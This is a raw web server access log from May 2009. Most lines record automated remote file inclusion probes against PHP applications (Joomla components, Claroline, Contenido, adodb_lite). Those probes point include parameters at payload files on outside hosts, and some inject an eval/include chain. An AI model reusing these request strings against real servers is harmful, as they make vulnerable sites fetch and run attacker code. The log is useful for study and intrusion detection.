77.221.130.4 - - [29/May/2009:00:00:02 -0400] "GET /logs/access_log.Q109052200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
77.221.130.4 - - [29/May/2009:00:00:02 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
77.221.130.4 - - [29/May/2009:00:00:03 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 3299 "-" "libwww-perl/5.805"
219.85.63.226 - - [29/May/2009:00:00:09 -0400] "GET ////administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:00:15 -0400] "GET /logs/access_log.Q109051100////administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:00:15 -0400] "GET /logs////administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:00:22 -0400] "GET /logs/access_log.Q109051600////administrator/components/com_virtuemart/toolbar.php?mosConfig_absolute_path=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.221.130.11 - - [29/May/2009:00:00:32 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 200 3299 "-" "libwww-perl/5.805"
77.221.130.11 - - [29/May/2009:00:00:33 -0400] "GET /logs/access_log.Q109052200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
77.221.130.11 - - [29/May/2009:00:00:33 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
77.221.130.11 - - [29/May/2009:00:00:35 -0400] "GET /logs/error_log.Q108051600//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.130.11 - - [29/May/2009:00:00:43 -0400] "GET /logs/error_log.Q109011700//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
72.18.148.82 - - [29/May/2009:00:00:53 -0400] "GET /logs/access_log.Q109021500%20%20/index.php?configFile=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:00:00:58 -0400] "GET /logs/access_log.Q109013000%20%20/index.php?configFile=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:00:01:22 -0400] "GET /logs//components/com_sef/sef.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:00:01:22 -0400] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:00:01:22 -0400] "GET /logs/access_log.Q109051600//components/com_sef/sef.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:01:46 -0400] "GET /logs/error_log.Q109052000/index.php?inhalt=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.188.91.69 - - [29/May/2009:00:01:55 -0400] "GET /logs/access_log.Q109050300//components/com_sef/sef.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.142.148.142 - - [29/May/2009:00:01:59 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.142.148.142 - - [29/May/2009:00:01:59 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:00:01:59 -0400] "GET /modules/My_eGallery/index.php?basepath=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.142.148.142 - - [29/May/2009:00:02:30 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
200.142.148.142 - - [29/May/2009:00:02:30 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.79.246.241 - - [29/May/2009:00:02:34 -0400] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 200 3299 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
77.79.246.241 - - [29/May/2009:00:02:34 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
77.79.246.241 - - [29/May/2009:00:02:42 -0400] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 200 3299 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
77.79.246.241 - - [29/May/2009:00:02:42 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
80.237.146.58 - - [29/May/2009:00:02:44 -0400] "GET /logs/error_log.Q108032700//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.76"
80.237.146.58 - - [29/May/2009:00:02:44 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.76"
80.237.146.58 - - [29/May/2009:00:02:44 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
220.79.47.122 - - [29/May/2009:00:03:06 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
212.174.7.5 - - [29/May/2009:00:03:17 -0400] "GET /logs/access_log.Q109052100%20%20//postscript/postscript.php?p_mode=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.174.7.5 - - [29/May/2009:00:03:17 -0400] "GET //postscript/postscript.php?p_mode=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
212.174.7.5 - - [29/May/2009:00:03:17 -0400] "GET /logs//postscript/postscript.php?p_mode=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
77.221.130.4 - - [29/May/2009:00:03:23 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
80.237.146.58 - - [29/May/2009:00:03:43 -0400] "GET /logs/error_log.Q108092500//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
77.221.130.11 - - [29/May/2009:00:03:45 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 200 3299 "-" "libwww-perl/5.805"
77.221.130.11 - - [29/May/2009:00:03:45 -0400] "GET /logs/access_log.Q109052200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
77.221.130.11 - - [29/May/2009:00:03:45 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
77.221.130.11 - - [29/May/2009:00:04:04 -0400] "GET /logs/error_log.Q109011700//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.gitchigaming.com/images/banners/.qwerty01?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
209.59.12.99 - - [29/May/2009:00:04:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.146.68.61 - - [29/May/2009:00:04:38 -0400] "GET /logs/error_log.Q109052000/index.php?inhalt=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.202.55.193 - - [29/May/2009:00:04:37 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.0" 200 64812 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
72.18.148.82 - - [29/May/2009:00:05:14 -0400] "GET /phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:00:05:14 -0400] "GET /logs/phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:00:05:14 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.202.55.193 - - [29/May/2009:00:05:19 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY HTTP/1.0" 200 76103 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
121.165.73.157 - - [29/May/2009:00:05:44 -0400] "GET /logs/access_log.Q109051000%20%20//?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:00:05:44 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 3299 "-" "Mozilla/5.0"
121.165.73.157 - - [29/May/2009:00:05:44 -0400] "GET //?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
200.142.148.142 - - [29/May/2009:00:05:57 -0400] "GET /logs/access_log.Q109052300//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:06:14 -0400] "GET //claroline/work.php?includePath=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:06:14 -0400] "GET /logs//claroline/work.php?includePath=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:06:14 -0400] "GET /logs/access_log.Q109051600//claroline/work.php?includePath=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
77.221.130.4 - - [29/May/2009:00:06:34 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
62.146.68.61 - - [29/May/2009:00:06:36 -0400] "GET //claroline/work.php?includePath=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:06:36 -0400] "GET /logs//claroline/work.php?includePath=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:06:36 -0400] "GET /logs/access_log.Q109051600//claroline/work.php?includePath=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.142.148.142 - - [29/May/2009:00:06:57 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.142.148.142 - - [29/May/2009:00:06:57 -0400] "GET /logs/access_log.Q109052300%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
80.237.146.58 - - [29/May/2009:00:07:22 -0400] "GET /logs/error_log.Q108120300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.76"
77.221.130.4 - - [29/May/2009:00:07:26 -0400] "GET /logs/error_log.Q108051600//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
220.181.7.97 - - [29/May/2009:00:07:52 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
212.150.52.114 - - [29/May/2009:00:08:09 -0400] "GET /?sourcedir=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
212.150.52.114 - - [29/May/2009:00:08:09 -0400] "GET /logs/?sourcedir=http://stptcellular.net/webalizer/test.txt? HTTP/1.1" 200 3294 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
77.221.130.4 - - [29/May/2009:00:08:43 -0400] "GET /logs/access_log.Q109052200//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
77.221.130.4 - - [29/May/2009:00:08:43 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
77.221.130.4 - - [29/May/2009:00:08:44 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 200 3299 "-" "libwww-perl/5.805"
200.142.148.142 - - [29/May/2009:00:08:44 -0400] "GET /logs/error_log.Q109042700//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:09:08 -0400] "GET /logs/access_log.Q109052300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:00:09:11 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:09:14 -0400] "GET /errors.php?error=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:09:14 -0400] "GET /logs/errors.php?error=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:09:14 -0400] "GET /logs/access_log.Q109051000/errors.php?error=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:00:09:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.85.63.226 - - [29/May/2009:00:09:27 -0400] "GET /logs/errors.php?error=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:09:27 -0400] "GET /logs/access_log.Q109051000%20%20/errors.php?error=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:09:27 -0400] "GET /errors.php?error=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.221.130.4 - - [29/May/2009:00:09:43 -0400] "GET /logs/error_log.Q109011700//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
74.54.32.201 - - [29/May/2009:00:10:23 -0400] "GET /logs/access_log.Q109051000//?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:10:26 -0400] "GET /logs/access_log.Q109051000/errors.php?error=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:10:26 -0400] "GET /errors.php?error=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
219.85.63.226 - - [29/May/2009:00:10:26 -0400] "GET /logs/errors.php?error=http://www.waisikkai.com//components/com_registration/copyright.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:10:32 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:10:32 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:10:32 -0400] "GET /logs/access_log.Q108081500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:10:36 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:10:36 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:10:36 -0400] "GET /logs/access_log.Q108081500/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.90.190.11 - - [29/May/2009:00:11:09 -0400] "GET /logs//language.inc.php?langs_dir=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
69.90.190.11 - - [29/May/2009:00:11:09 -0400] "GET //language.inc.php?langs_dir=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
69.90.190.11 - - [29/May/2009:00:11:12 -0400] "GET /logs/access_log.Q109042200%20%20//language.inc.php?langs_dir=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.142.148.142 - - [29/May/2009:00:11:15 -0400] "GET /logs/error_log.Q108122800%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:00:11:48 -0400] "GET /logs/local.php?cfg[path][contenido]=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:00:11:48 -0400] "GET /local.php?cfg[path][contenido]=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:00:11:52 -0400] "GET /local.php?cfg[path][contenido]=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
201.232.54.48 - - [29/May/2009:00:11:52 -0400] "GET /logs/local.php?cfg[path][contenido]=http://www.xshellbrx.by.ru/id1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:00:12:18 -0400] "GET /xGB.php?act=admin&do=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:00:12:18 -0400] "GET /logs/xGB.php?act=admin&do=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:00:12:24 -0400] "GET /logs/access_log.Q108021800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
69.94.125.100 - - [29/May/2009:00:12:24 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.94.125.100 - - [29/May/2009:00:12:24 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
62.146.68.61 - - [29/May/2009:00:12:32 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:12:32 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:12:32 -0400] "GET /logs/error_log.Q109050500%20%20//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:12:33 -0400] "GET //authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:12:33 -0400] "GET /logs//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:12:33 -0400] "GET /logs/error_log.Q109050500%20%20//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:00:12:49 -0400] "GET /logs/access_log.Q108072800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.curling-erfurt.de/media/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
62.146.68.61 - - [29/May/2009:00:13:10 -0400] "GET /logs/access_log.Q108081500%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
62.146.68.61 - - [29/May/2009:00:13:29 -0400] "GET /logs/access_log.Q108081500%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.142.148.142 - - [29/May/2009:00:13:39 -0400] "GET /logs/access_log.Q109052300//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:14:03 -0400] "GET /logs/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:14:03 -0400] "GET /index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:00:14:03 -0400] "GET /logs/access_log.Q109021500%20%20/index.php?configFile=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
